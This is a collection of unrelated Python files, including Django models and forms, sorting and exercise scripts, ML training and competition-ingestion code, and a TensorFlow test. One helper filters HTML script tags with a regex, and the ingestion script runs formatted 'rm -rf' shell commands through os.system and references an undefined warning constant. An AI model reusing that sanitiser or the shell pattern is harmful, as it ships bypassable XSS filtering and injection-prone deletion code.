server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
server.sendmail(fromaddr, toaddr, messagetosend)
server.quit()
return
|
# 3.1.1 list
# 1.
datalist = [1452, 11.23, 1+ 2j, True, 'w3source', (0, -1), [5, 12],
{"class": 'v', "section": 'a'}]
for i in datalist:
print(i, ":", type(i))
# 3.1.2 Numberlist
# 2a
lst = [1, -1, 2, 0, 5, 8, -13, 21, -34, 55, 87, 0]
def haib(list):
for i in list:
if i < 5:
print(i)
haib(lst)
lst = [1, -1, 2, 0, 5, 8, -13, 21, -34, 55, 87, 0]
list_moi = []
def haic(list):
for i in list:
if i < 5:
list_moi.append(i)
print(list_moi)
haic(lst)
a = [2, 3 ,4]
b = 1
c = 1.5
list
68
|
from django.db import models
import os
class ComplexityPost(models.Model):
post = models.CharField(max_length=25)
guess = models.CharField(max_length=25)
date = models.DateTimeField(auto_now_add=True)
class MastersPost(models.Model):
post_a = models.CharField(max_length=5)
post_b = models.CharField(max_length=5)
post_k = models.CharField(max_length=5)
post_i = models.CharField(max_length=5, default=0)
date = models.DateTimeField(auto_now_add=True) |
class QuickSort:
def quick_sort(self, arr):
"""
:param arr:list{int]
:return: list[int]
"""
if not arr or len(arr) <= 1:
return arr
def qs(arr, left, right):
if left >= right:
return
i, j = left, right
key = arr[left]
while 1:
while arr[i] < key:
i += 1
if i == right:
break
while arr[j] > key:
j -= 1
if j == left:
break
if i >= j:
break
swap(arr, i, j)
qs(arr, left, i)
qs(arr, i + 1, right)
def swap(arr, i, j):
arr[i] ^= arr[j]
arr[j] ^= arr[i]
arr[i] ^= arr[j]
qs(arr, 0, len(arr) - 1)
return arr
s = QuickSort()
arr = [7, 3, 9, 5, 4, 10, 1]
print(s.quick_sort(arr))
|
def prime_num():
try:
n=0
l=int(input())
r=int(input())
for num in range(l,r+ 1):
if num > 1:
for i in range(2,num):
if (num % i) == 0:
break
else:
n=n+1
print(n)
except:
print("enter valid value")
prime_num()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Adventure object
"""
from object import AdventureGameObject
class AdventureGameObjectAltar(AdventureGameObject):
"Adventure Game Object"
def getName(self):
"Get the name of the object"
return "Altar"
def check(self):
"Print an desc. of the object"
print("\nYou see an altar with 3 inscriptions on it.")
print("The inscriptions is the icons of a water drop, a leaf and a fire.")
def open(self, openedByRoom):
"Try to open the object"
print("\nYou can't open the altar.")
def kick(self, kickedByRoom):
"Try to kick the object"
print("\nYou can't kick the altar.")
def move(self, movedByRoom):
"Try to move the object"
print("\nYou can't move the altar.")
def talk(self, talkedByRoom, phrase):
"Try to talk to the object"
print("\nYou can't talk to the altar.")
def use(self, usedByRoom):
"Try to use the object"
pass
def canPickup(self):
"Check if the object is pickupable"
return False
|
import FWCore.ParameterSet.Config as cms
def customise_trackMon_IterativeTracking_2012(process):
## DEBUGGING
# if hasattr(process,"trackMonIterativeTracking2012"):
# print "trackMonIterativeTracking2012 DEFINED !!!"
# else :
# print "trackMonIterativeTracking2012 NOT DEFINED !!!"
# print "IterativeTracking_2012"
from DQM.TrackingMonitor.TrackingMonitorSeedNumber_cff import trackMonIterativeTracking2012
for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"] :
idx = getattr(process,s).index(getattr(process,"TrackMonStep0"))
getattr(process,s).remove(getattr(process,"TrackMonStep0") )
getattr(process,s).remove(getattr(process,"TrackMonStep1") )
getattr(process,s).remove(getattr(process,"TrackMonStep2") )
getattr(process,s).remove(getattr(process,"TrackMonStep3") )
getattr(process,s).remove(getattr(process,"TrackMonStep4") )
getattr(process,s).remove(getattr(process,"TrackMonStep5") )
getattr(process,s).remove(getattr(process,"TrackMonStep6") )
getattr(process,s).remove(getattr(process,"TrackMonStep9") )
getattr(process,s).remove(getattr(process,"TrackMonStep10") )
getattr(process,s).insert(idx,getattr(process,"trackMonIterativeTracking2012"))
return process
######### Phase1
def customise_trackMon_IterativeTracking_PHASE1(process):
## DEBUGGING
# if hasattr(process,"trackMonIterativeTracking2012"):
# print "trackMonIterativeTracking2012 DEFINED !!!"
# else :
# print "trackMonIterativeTracking2012 NOT DEFINED !!!"
# print "IterativeTracking_PHASE1"
process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_PhaseI_cff")
for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"] :
idx = getattr(process,s).index(getattr(process,"TrackMonStep0"))
getattr(process,s).remove(getattr(process,"TrackMonStep0") )
getattr(process,s).remove(getattr(process,"TrackMonStep1") )
getattr(process,s).remove(getattr(process,"TrackMonStep2") )
getattr(process,s).remove(getattr(process,"TrackMonStep3") )
getattr(process,s).remove(getattr(process,"TrackMonStep4") )
getattr(process,s).remove(getattr(process,"TrackMonStep5") )
getattr(process,s).remove(getattr(process,"TrackMonStep6") )
getattr(process,s).remove(getattr(process,"TrackMonStep9") )
getattr(process,s).remove(getattr(process,"TrackMonStep10") )
getattr(process,s).insert(idx,getattr(process,"trackMonIterativeTrackingPhaseI"))
return process
######## Phase1 PU70
def customise_trackMon_IterativeTracking_PHASE1PU70(process):
## DEBUGGING
# if hasattr(process,"trackMonIterativeTracking2012"):
# print "trackMonIterativeTracking2012 DEFINED !!!"
# else :
# print "trackMonIterativeTracking2012 NOT DEFINED !!!"
# print "IterativeTracking_PHASE1_PU70"
process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_Phase1PU70_cff")
for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"] :
idx = getattr(process,s).index(getattr(process,"TrackMonStep0"))
getattr(process,s).remove(getattr(process,"TrackMonStep0") )
getattr(process,s).remove(getattr(process,"TrackMonStep1") )
getattr(process,s).remove(getattr(process,"TrackMonStep2") )
getattr(process,s).remove(getattr(process,"TrackMonStep3") )
getattr(process,s).remove(getattr(process,"TrackMonStep4") )
getattr(process,s).remove(getattr(process,"TrackMonStep5") )
getattr(process,s).remove(getattr(process,"TrackMonStep6") )
getattr(process,s).remove(getattr(process,"TrackMonStep9") )
getattr(process,s).remove(getattr(process,"TrackMonStep10") )
getattr(process,s).insert(idx,getattr(process,"trackMonIterativeTrackingPhase1PU70"))
return process
######## Phase1 PU140
def customise_trackMon_IterativeTracking_PHASE1PU140(process):
## DEBUGGING
# if hasattr(process,"trackMonIterativeTracking2012"):
# print "trackMonIterativeTracking2012 DEFINED !!!"
# else :
# print "trackMonIterativeTracking2012 NOT DEFINED !!!"
# print "IterativeTracking_PHASE1_PU140"
process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_Phase1PU140_cff")
for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"] :
idx = getattr(process,s).index(getattr(process,"TrackMonStep0"))
getattr(process,s).remove(getattr(process,"TrackMonStep0") )
getattr(process,s).remove(getattr(process,"TrackMonStep1") )
getattr(process,s).remove(getattr(process,"TrackMonStep2") )
getattr(process,s).remove(getattr(process,"TrackMonStep3") )
getattr(process,s).remove(getattr(process,"TrackMonStep4") )
getattr(process,s).remove(getattr(process,"TrackMonStep5") )
getattr(process,s).remove(getattr(process,"TrackMonStep6") )
getattr(process,s).remove(getattr(process,"TrackMonStep9") )
getattr(process,s).remove(getattr(process,"TrackMonStep10") )
getattr(process,s).insert(idx,getattr(process,"trackMonIterativeTrackingPhase1PU140"))
return process
|
''' An example of training a reinforcement learning agent on the PettingZoo
environments that wrap RLCard
'''
import os
import argparse
import torch
from pettingzoo.classic import (
leduc_holdem_v4,
texas_holdem_v4,
texas_holdem_no_limit_v6,
gin_rummy_v4,
)
from rlcard.agents.pettingzoo_agents import RandomAgentPettingZoo
from rlcard.utils import (
get_device,
set_seed,
Logger,
plot_curve,
run_game_pettingzoo,
reorganize_pettingzoo,
tournament_pettingzoo,
)
env_name_to_env_func = {
"leduc-holdem": leduc_holdem_v4,
"limit-holdem": texas_holdem_v4,
"no-limit-holdem": texas_holdem_no_limit_v6,
"gin-rummy": gin_rummy_v4,
}
def train(args):
# Check whether gpu is available
device = get_device()
# Seed numpy, torch, random
set_seed(args.seed)
# Make the environment with seed
env_func = env_name_to_env_func[args.env]
env = env_func.env()
env.reset(seed=args.seed)
# Initialize the agent and use random agents as opponents
learning_agent_name = env.agents[0]
if args.algorithm == 'dqn':
from rlcard.agents.pettingzoo_agents import DQNAgentPettingZoo
agent = DQNAgentPettingZoo(
num_actions=env.action_space(learning_agent_name).n,
state_shape=env.observation_space(learning_agent_name)["observation"].shape,
mlp_layers=[64,64],
device=device
)
elif args.algorithm == 'nfsp':
from rlcard.agents.pettingzoo_agents import NFSPAgentPettingZoo
agent = NFSPAgentPettingZoo(
num_actions=env.action_space(learning_agent_name).n,
state_shape=env.observation_space(learning_agent_name)["observation"].shape,
hidden_layers_sizes=[64,64],
q_mlp_layers=[64,64],
device=device
)
agents = {learning_agent_name: agent}
for i in range(1, env.num_agents):
agents[env.agents[i]] = RandomAgentPettingZoo(num_actions=env.action_space(env.agents[i]).n)
# Start training
num_timesteps = 0
with Logger(args.log_dir) as logger:
for episode in range(args.num_episodes):
if args.algorithm == 'nfsp':
agent.sample_episode_policy()
# Generate data from the environment
trajectories = run_game_pettingzoo(env, agents, is_training=True)
trajectories = reorganize_pettingzoo(trajectories)
num_timesteps += sum([len(t) for t in trajectories.values()])
for ts in trajectories[learning_agent_name]:
agent.feed(ts)
# Evaluate the performance. Play with random agents.
if episode % args.evaluate_every == 0:
average_rewards = tournament_pettingzoo(env, agents, args.num_eval_games)
logger.log_performance(episode, average_rewards[learning_agent_name])
# Get the paths
csv_path, fig_path = logger.csv_path, logger.fig_path
# Plot the learning curve
plot_curve(csv_path, fig_path, args.algorithm)
# Save model
save_path = os.path.join(args.log_dir, 'model.pth')
torch.save(agent, save_path)
print('Model saved in', save_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser("DQN/NFSP example in RLCard")
parser.add_argument(
'--env',
type=str,
default='leduc-holdem',
choices=[
'leduc-holdem',
'limit-holdem',
'doudizhu',
'mahjong',
'no-limit-holdem',
'uno',
'gin-rummy',
],
)
parser.add_argument(
'--algorithm',
type=str,
default='dqn',
choices=[
'dqn',
'nfsp',
],
)
parser.add_argument(
'--cuda',
type=str,
default='',
)
parser.add_argument(
'--seed',
type=int,
default=42,
)
parser.add_argument(
'--num_episodes',
type=int,
default=5000,
)
parser.add_argument(
'--num_eval_games',
type=int,
default=2000,
)
parser.add_argument(
'--evaluate_every',
type=int,
default=100,
)
parser.add_argument(
'--log_dir',
type=str,
default='experiments/leduc_holdem_dqn_result/',
)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.cuda
train(args)
|
# for row in range(0,13):
# if row == 0:
# th = "x "
# for x in range(1,13):
# th+=str(x) +" "
# print th
# continue
# string = "" + str(row) + " "
# for colum in range(1,13):
# string += str(row*colum) + " "
# print string |
#!/usr/bin/env python3
import os
import sys
import warnings
import argparse
import numpy as np
import shutil
import json
import grid2op
from grid2op.Runner import Runner
from grid2op.Chronics import ChangeNothing
from grid2op.Agent import BaseAgent
from grid2op.Reward import BaseReward, RedispReward, L2RPNSandBoxScore
from grid2op.Action import TopologyAndDispatchAction
from grid2op.Episode import EpisodeReplay
from grid2op.dtypes import dt_int
DEBUG = True # we'll change that for the real competition
SUBMISSION_DIR_ERR = """
ERROR: Impossible to find a "submission" package.
Agents should be included in a "submission" directory
A module with a function "make_agent" to load the agent that will be assessed."
"""
MAKE_AGENT_ERR = """
ERROR: We could NOT find a function name \"make_agent\"
in your \"submission\" package. "
We remind you that this function is mandatory and should have the signature:
make_agent(environment, path_agent) -> agent
- The "agent" is the agent that will be tested.
- The "environment" is a valid environment provided.
It will NOT be updated during the scoring (no data are fed to it).
- The "path_agent" is the path where your agent is located
"""
ENV_TEMPLATE_ERR = """
ERROR: There is no powergrid found for making the template environment.
Or creating the template environment failed.
The agent will not be created and this will fail.
"""
MAKE_AGENT_ERR2 = """
ERROR: "make_agent" is present in your package, but can NOT be used.
We remind you that this function is mandatory and should have the signature:
make_agent(environment, path_agent) -> agent
- The "agent" is the agent that will be tested.
- The "environment" is a valid environment provided.
It will NOT be updated during the scoring (no data are fed to it).
- The "path_agent" is the path where your agent is located
"""
BASEAGENT_ERR = """
ERROR: The "submitted_agent" provided should be a valid Agent.
It should be of class that inherit "grid2op.Agent.BaseAgent" base class
"""
INFO_CUSTOM_REWARD = """
INFO: No custom reward for the assessment of your agent will be used.
"""
REWARD_ERR = """
ERROR: The "training_reward" provided should be a class.
NOT a instance of a class
"""
REWARD_ERR2 = """
ERROR: The "training_reward" provided is invalid.
It should inherit the "grid2op.Reward.BaseReward" class
"""
INFO_CUSTOM_OTHER = """
INFO: No custom other_rewards for the assessment of your agent will be used.
"""
KEY_OVERLOAD_REWARD = """
WARNING: You provided the key "{0}" in the "other_reward" dictionnary.
This will be replaced by the score of the competition, as stated in the rules. Your "{0}" key WILL BE erased by this operation.
"""
BACKEND_WARN = """
WARNING: Could not load lightsim2grid.LightSimBackend, falling back on PandaPowerBackend
"""
INFO_ENV_INGESTION_OK = """
Env {} ingestion data saved in : {}
"""
def cli():
DEFAULT_KEY_SCORE = "grid_operation_cost"
DEFAULT_NB_EPISODE = 10
DEFAULT_GIF_ENV = None
DEFAULT_GIF_EPISODE = None
DEFAULT_GIF_START = 0
DEFAULT_GIF_END = 50
DEFAULT_CLEANUP = False
parser = argparse.ArgumentParser(description="Ingestion program")
parser.add_argument("--input_path", required=True,
help="Path to the datasets folders")
parser.add_argument("--output_path", required=True,
help="Path to the runner logs output dir")
parser.add_argument("--program_path", required=True,
help="Path to the program dir")
parser.add_argument("--submission_path", required=True,
help="Path to the submission dir")
parser.add_argument("--key_score", required=False,
default=DEFAULT_KEY_SCORE, type=str,
help="Codalab other_reward name")
parser.add_argument("--nb_episode", required=False,
default=DEFAULT_NB_EPISODE, type=int,
help="Number of episodes in the dataset")
parser.add_argument("--config_in", required=True,
help="Json config input file")
parser.add_argument("--gif_env", required=False,
default=DEFAULT_GIF_ENV, type=str,
help="Name of the environment to generate a gif for")
parser.add_argument("--gif_episode", required=False,
default=DEFAULT_GIF_EPISODE, type=str,
help="Name of the episode to generate a gif for")
parser.add_argument("--gif_start", required=False,
default=DEFAULT_GIF_START, type=int,
help="Start step for gif generation")
parser.add_argument("--gif_end", required=False,
default=DEFAULT_GIF_END, type=int,
help="End step for gif generation")
parser.add_argument("--cleanup", required=False,
default=DEFAULT_CLEANUP, action='store_true',
help="Cleanup runner logs")
return parser.parse_args()
def write_gif(output_dir, agent_path, episode_name, start_step, end_step):
try:
epr = EpisodeReplay(agent_path)
epr.replay_episode(episode_name, fps=2.0,
load_info=None,
gen_info=None,
line_info=None,
display=False,
gif_name=episode_name,
start_step=start_step,
end_step=end_step)
gif_genpath = os.path.join(agent_path, episode_name,
episode_name + ".gif")
gif_outpath = os.path.join(output_dir, episode_name + ".gif")
print (gif_genpath, gif_outpath)
if os.path.exists(gif_genpath):
shutil.move(gif_genpath, gif_outpath)
except:
print("Cannot create GIF export")
def main():
args = cli()
# read arguments
input_dir = args.input_path
output_dir = args.output_path
program_dir = args.program_path
submission_dir = args.submission_path
config_file = args.config_in
with open(config_file, "r") as f:
config = json.load(f)
# Generate seeds once
np.random.seed(int(config["score_config"]["seed"]))
max_int = np.iinfo(dt_int).max
env_seeds = list(np.random.randint(max_int, size=args.nb_episode))
agent_seeds = list(np.random.randint(max_int, size=args.nb_episode))
# create output dir if not existing
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if DEBUG:
print("input dir: {}".format(input_dir))
print("output dir: {}".format(output_dir))
print("program dir: {}".format(program_dir))
print("submission dir: {}".format(submission_dir))
print("input content", os.listdir(input_dir))
print("output content", os.listdir(output_dir))
print("program content", os.listdir(program_dir))
print("Content received by codalab: {}".format(sorted(os.listdir(submission_dir))))
submission_location = os.path.join(submission_dir, "submission")
if not os.path.exists(submission_location):
print(SUBMISSION_DIR_ERR)
raise RuntimeError(SUBMISSION_DIR_ERR)
# add proper directories to path
sys.path.append(program_dir)
sys.path.append(submission_dir)
try:
from submission import make_agent
except Exception as e:
print(e)
raise RuntimeError(MAKE_AGENT_ERR) from None
try:
from submission import reward
except:
print(INFO_CUSTOM_REWARD)
reward = RedispReward
if not isinstance(reward, type):
raise RuntimeError(REWARD_ERR)
if not issubclass(reward, BaseReward):
raise RuntimeError(REWARD_ERR2)
try:
from submission import other_rewards
except:
print(INFO_CUSTOM_OTHER)
other_rewards = {}
if args.key_score in other_rewards:
print(KEY_OVERLOAD_WARN.format(args.key_score))
other_rewards[args.key_score] = L2RPNSandBoxScore
# Loop over env dirs
for env_dir in os.listdir(input_dir):
env_path = os.path.join(input_dir, env_dir)
if not os.path.isdir(env_path):
continue
try:
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
env_template = grid2op.make(env_path,
chronics_class=ChangeNothing,
action_class=TopologyAndDispatchAction)
except Exception as e:
raise RuntimeError(ENV_TEMPLATE_ERR)
try:
submitted_agent = make_agent(env_template, submission_location)
except Exception as e:
raise RuntimeError(MAKE_AGENT_ERR2)
if not isinstance(submitted_agent, BaseAgent):
raise RuntimeError(BASEAGENT_ERR)
try:
from lightsim2grid.LightSimBackend import LightSimBackend
backend = LightSimBackend()
except:
print (BACKEND_WARN)
from grid2op.Backend import PandaPowerBackend
backend = PandaPowerBackend()
real_env = grid2op.make(env_path,
backend=backend,
reward_class=reward,
other_rewards=other_rewards)
runner = Runner(**real_env.get_params_for_runner(),
agentClass=None, agentInstance=submitted_agent)
path_save = os.path.abspath(os.path.join(output_dir, env_dir))
runner.run(nb_episode=args.nb_episode,
path_save=path_save,
max_iter=-1,
env_seeds=env_seeds,
agent_seeds=agent_seeds)
print(INFO_ENV_INGESTION_OK.format(env_dir, path_save))
real_env.close()
env_template.close()
# Generate a gif if enabled
if args.gif_env is not None and args.gif_episode is not None:
gif_input = os.path.join(output_dir, args.gif_env)
write_gif(output_dir, gif_input, args.gif_episode,
args.gif_start, args.gif_end)
if args.cleanup:
cmds = [
"find {} -name '*.npz' | xargs -i rm -rf {}",
"find {} -name 'dict_*.json' | xargs -i rm -rf {}",
"find {} -name '_parameters.json' | xargs -i rm -rf {}"
]
for cmd in cmds:
os.system(cmd.format(output_dir, "{}"))
if __name__ == "__main__":
import traceback
try:
main()
except Exception as e:
print("------------------------------------")
print(" Detailed error Logs ")
print("------------------------------------")
traceback.print_exc(file=sys.stdout)
print("------------------------------------")
print(" End Detailed error Logs ")
print("------------------------------------")
sys.exit(1)
|
#!/usr/bin/python3
#
import random
import string
def getRndStr(length):
letters = string.ascii_lowercase
result = ''.join(random.choice(letters) for i in range(length))
return result
print(getRndStr(5))
print(getRndStr(5))
|
# The analysis file that is created by the get_probs_at_frame file stores information for the files. This reads
# that information and allows for creating more concise meaningful stats.
import ast
import numpy as np
with open("analysis-dec-16-ss90-96-98.txt", "r") as f:
frame_start_attempts = []
frame_attempts_lengths = []
count = 0
num_attempts = 0
for line in f.readlines():
# print(line)
items = line.split(" ")
name = items[0]
if("SS00090" in name):
count += 1
data = line[line.index("[")-1:line.index("]")+1].strip()
print(data)
if(len(data) > 2):
for x in ast.literal_eval(data):
frame_start_attempts.append(x[0])
frame_attempts_lengths.append(x[1])
num_attempts += 1
else:
num_attempts += 1
print(frame_start_attempts)
print(frame_attempts_lengths)
print(np.mean(frame_start_attempts))
print(np.std(frame_start_attempts))
print(np.mean(frame_attempts_lengths))
print(np.std(frame_attempts_lengths))
print("avg attempts per frame: " + str(num_attempts/count))
print("count: " + str(count)) |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ipu import ipu_compiler
from tensorflow.python.ipu import loops
from tensorflow.python.ipu.ipu_session_run_hooks import IPULoggingTensorHook
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
@test_util.deprecated_graph_mode_only
class IPULoggingTensorHookTest(test_util.TensorFlowTestCase):
def mock_log(self, *args, **kwargs):
del kwargs
self.logged_message = args
def test_illegal_args(self):
with self.assertRaisesRegex(
ValueError, "Cannot provide both every_n_iter and every_n_secs"):
IPULoggingTensorHook(every_n_iter=5, every_n_secs=5)
with self.assertRaisesRegex(
ValueError,
"Either every_n_iter, every_n_secs or at_end should be provided"):
IPULoggingTensorHook()
def test_illegal_log_types(self):
hook = IPULoggingTensorHook(at_end=True)
with self.assertRaisesRegex(TypeError, "Expected `tf.Tensor`"):
hook.log("foo")
with self.assertRaisesRegex(TypeError, "Expected `tf.Tensor`"):
hook.log([1.0])
def test_missing_log_call(self):
hook = IPULoggingTensorHook(at_end=True)
with self.assertRaisesRegex(RuntimeError,
"Did you forget to call the log function"):
hook.begin()
def test_log_twice_not_supported(self):
hook = IPULoggingTensorHook(at_end=True)
with ipu_scope("/device:IPU:0"):
t = constant_op.constant(0.0)
hook.log(t)
with self.assertRaisesRegex(
RuntimeError,
"Cannot use this hook object's log function more than once"):
return hook.log(t)
def test_print_tensor(self):
hook = IPULoggingTensorHook(at_end=True)
def model():
t = constant_op.constant(42.0, name="foo")
return hook.log(t)
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "foo:0 = 42.0")
def test_print_list(self):
hook = IPULoggingTensorHook(at_end=True)
def model():
t1 = constant_op.constant(42.0, name="foo")
t2 = constant_op.constant(43.0, name="bar")
return hook.log([t1, t2])
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "foo:0 = 42.0, bar:0 = 43.0")
def test_print_dict(self):
hook = IPULoggingTensorHook(at_end=True)
def model():
t1 = constant_op.constant(42.0)
t2 = constant_op.constant(43.0)
return hook.log({"foo": t1, "bar": t2})
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "foo = 42.0, bar = 43.0")
def test_print_formatter(self):
def formatter(args):
self.assertIsInstance(args, dict)
return "foobar: {}".format(args)
hook = IPULoggingTensorHook(at_end=True, formatter=formatter)
def model():
t1 = constant_op.constant(42.0, name="foo")
t2 = constant_op.constant(43.0, name="bar")
return hook.log([t1, t2])
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message),
r"foobar: \{'foo:0': 42.0, 'bar:0': 43.0\}")
def test_print_at_end_only(self):
hook = IPULoggingTensorHook(at_end=True)
def model():
t = constant_op.constant(42.0, name="foo")
return hook.log(t)
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
self.logged_message = ""
for _ in range(3):
mon_sess.run(compiled_model)
self.assertEqual(str(self.logged_message).find("foo"), -1)
self.assertRegex(str(self.logged_message), "foo:0 = 42.0")
def test_print_all_at_end(self):
hook = IPULoggingTensorHook(
at_end=True, logging_mode=IPULoggingTensorHook.LoggingMode.ALL)
def body(v):
logging_op = hook.log({"foo": v})
with ops.control_dependencies([logging_op]):
return v + 1
def model():
return loops.repeat(2, body, inputs=[1.0])
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
for _ in range(2):
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), r"foo = \[1. 2. 1. 2.\]")
def test_print_every_n_iter(self):
hook = IPULoggingTensorHook(every_n_iter=2)
def model():
step = variables.Variable(0)
return hook.log({"step": step.assign_add(1).value()})
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
# Test re-using the hook.
for _ in range(2):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "step = 1")
self.logged_message = ""
mon_sess.run(compiled_model)
self.assertEqual(self.logged_message, "")
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "step = 3")
@test.mock.patch.object(time, "time")
def test_print_every_n_secs(self, mock_time):
hook = IPULoggingTensorHook(every_n_secs=0.5)
def model():
return hook.log({"log": constant_op.constant(0)})
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
with test.mock.patch.object(tf_logging, "info", self.mock_log):
with MonitoredTrainingSession(hooks=[hook]) as mon_sess:
mock_time.return_value = 1.0
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "log = 0")
self.logged_message = ""
mock_time.return_value = 1.49
mon_sess.run(compiled_model)
self.assertEqual(self.logged_message, "")
mock_time.return_value = 1.5
mon_sess.run(compiled_model)
self.assertRegex(str(self.logged_message), "log = 0")
def test_two_hooks(self):
hook1 = IPULoggingTensorHook(every_n_iter=1)
hook2 = IPULoggingTensorHook(
every_n_iter=2, logging_mode=IPULoggingTensorHook.LoggingMode.ALL)
def model():
step = variables.Variable(0)
updated = step.assign_add(1).value()
return hook1.log({"hook1": updated}), hook2.log({"hook2": updated})
with ipu_scope("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model)
logged_messages = []
def mock_log(*args, **kwargs):
del kwargs
logged_messages.append(str(args))
with MonitoredTrainingSession(hooks=[hook1, hook2]) as mon_sess:
with test.mock.patch.object(tf_logging, "info", mock_log):
mon_sess.run(compiled_model)
self.assertEqual(len(logged_messages), 2)
self.assertRegex(logged_messages[0], "hook1 = 1")
self.assertRegex(logged_messages[1], r"hook2 = \[1\]")
mon_sess.run(compiled_model)
self.assertEqual(len(logged_messages), 3)
self.assertRegex(logged_messages[2], "hook1 = 2")
mon_sess.run(compiled_model)
self.assertEqual(len(logged_messages), 5)
self.assertRegex(logged_messages[3], "hook1 = 3")
self.assertRegex(logged_messages[4], r"hook2 = \[2 3\]")
if __name__ == "__main__":
test.main()
|
#! /usr/bin/python3
from sys import argv
w = int( argv[1] ) if len( argv ) == 2 else 16
h = ( ' +', '--+' )
v = ( ' ', ' |', 'OO ', 'OO|' )
print( '+' + '--+' * w )
while True:
try:
line=input()
except EOFError:
break
print( '|', *[ v[int( c ) >> 1 & 3] for c in line ], sep='' )
print( '+', *[ h[int( c ) & 1] for c in line ], sep='' )
|
import os
import re
from django.conf import settings
def validation_error(parameter, value=None, field=None):
msg = 'Invalid "%s" value' % (parameter,)
if value is not None:
msg += '("%s")' % (value,)
return {'error': msg, 'error_code': 406, 'field': parameter}
def validate_regexp(key, value):
return re.match(settings.REGEXP[key], value)
_script_pattern = re.compile(
r'<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>',
flags=re.IGNORECASE)
def remove_script(input_str):
if input_str:
return _script_pattern.sub('[filtered]', input_str)
else:
return input_str |
# 455. Assign Cookies
# https://leetcode.com/problems/assign-cookies/description/
class Solution:
def findContentChildren(self, g, s):
"""
:type g: List[int]
:type s: List[int]
:rtype: int
"""
g.sort()
s.sort()
i = 0
for size in s:
if i == len(g): break
if g[i] <= size : i+=1
return i
|
from django import forms
from rbmo.models import AllotmentReleases
from django.contrib.auth.models import User
class AllotmentReleaseForm(forms.Form):
MONTHS = ((1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'),
(5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'),
(10, 'October'), (11, 'November'), (12, 'December'))
ada = forms.IntegerField(widget=forms.NumberInput(attrs={
'class' : 'form-control',
'required' : 'True'
}))
month = forms.ChoiceField(choices=MONTHS,
widget=forms.Select(attrs={
'class': 'form-control'
}
))
amount = forms.DecimalField(widget=forms.NumberInput(
attrs={'class': 'form-control',
'required': 'True'
}
))
class Meta:
model = AllotmentReleases
fields = ['ada', 'month', 'amount_release']
|
# Generated by Django 3.1.5 on 2021-01-27 23:11
import core.models
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Projects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='name')),
('description', models.CharField(max_length=256, verbose_name='description')),
('img', stdimage.models.StdImageField(upload_to=core.models.get_file_path, verbose_name='Image')),
],
options={
'verbose_name': 'Projects',
'verbose_name_plural': 'project',
},
),
]
|
import numpy as np
import gym
import math
import os
import pickle
import neat
from neat.reporting import *
import time
import torch.multiprocessing as mp
from utils import *
from config import *
class GenomeEvaluator:
